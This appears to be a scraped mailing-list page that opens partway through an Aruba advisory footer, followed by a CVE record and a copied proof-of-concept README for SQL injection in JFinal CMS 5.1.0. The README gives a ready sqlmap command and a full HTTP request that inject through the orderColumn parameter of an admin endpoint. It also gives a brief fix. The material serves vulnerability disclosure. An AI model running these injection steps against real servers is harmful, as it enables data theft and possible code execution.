security incidents is available at: https://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: https://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2022 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQFLBAEBCAA1FiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAmMHgBgXHHNpcnRAYXJ1 YmFuZXR3b3Jrcy5jb20ACgkQmP4JykWFhtk4RwgAh3LkQyH3a1MC+/oN2s7L1A/J 5HJA5Sj4Rp7YEYRFIOsW6+MzvdWiJyooP9KwjK3mXdlAVxxQQG4kmx+KWTAJKxYq MntGikHQsoe/xcc9pqVRINIHpjofipaK6zYwPJNC8cBi8IgabGW/eD9nsDloi3mJ up+IeAMtN1af0O7/UB8bPWp0bFPYuSYUz6RGSKIfAoDRAwnbD5BRynUFhG+eunOT AtpZTz+9a7k3EpFrniQckJQci4w/T+TDL/HOS9suv1PPZFuQALyRPtScZGHTV4b6 /7cuqsOZcwld8Xy9UkpPUdWofoD5kY0aKp6cTfjn7ZMKY0/x8NG6UDDFBbcv8Q== =R1LV -----END PGP SIGNATURE-----

CVE-2022-37884

JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.

\[Suggested description\] \*\* RESERVED \*\*JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection.

\[Additional Information\] https://github.com/AgainstTheLight/someEXP\_of\_jfinal\_cms/blob/main/jfinal\_cms/sql8.md

\[Vulnerability Type\] SQL Injection

\[Vendor of Product\] the development group

\[Affected Product Code Base\] https://github.com/jflyfox/jfinal\_cms - JFinal CMS 5.1.0

\[Affected Component\] These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection

\[Attack Type\] Remote

\[Impact Code execution\] true

\[Impact Information Disclosure\] true

\[Attack Vectors\] User login is required

\[Reference\] https://github.com/AgainstTheLight/someEXP\_of\_jfinal\_cms/blob/main/jfinal\_cms/sql8.md

\[Discoverer\] jw5t

Use CVE-2022-37205.

CVE-2022-37205: CVE-2022-37205/README.md at main · AgainstTheLight/CVE-2022-37205

Final CMS 5.1.0 is vulnerable to SQL Injection.

Permalink

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/admin/friendlylink/list  --thread 8 --batch --smart  --random-agent --data "form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**TEST**

    POST /jfinal_cms/admin/friendlylink/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 96
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/admin/friendlylink/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
    Connection: close
    
    form.orderColumn=url*&form.orderAsc=asc&attr.name=&totalRecords=10&pageNo=1&pageSize=20&length=10

CVE-2022-37204: someEXP_of_jfinal_cms/sql7.md at main · AgainstTheLight/someEXP_of_jfinal_cms

**Email display mode:**

Modern rendering  
Legacy rendering

Tag

#sql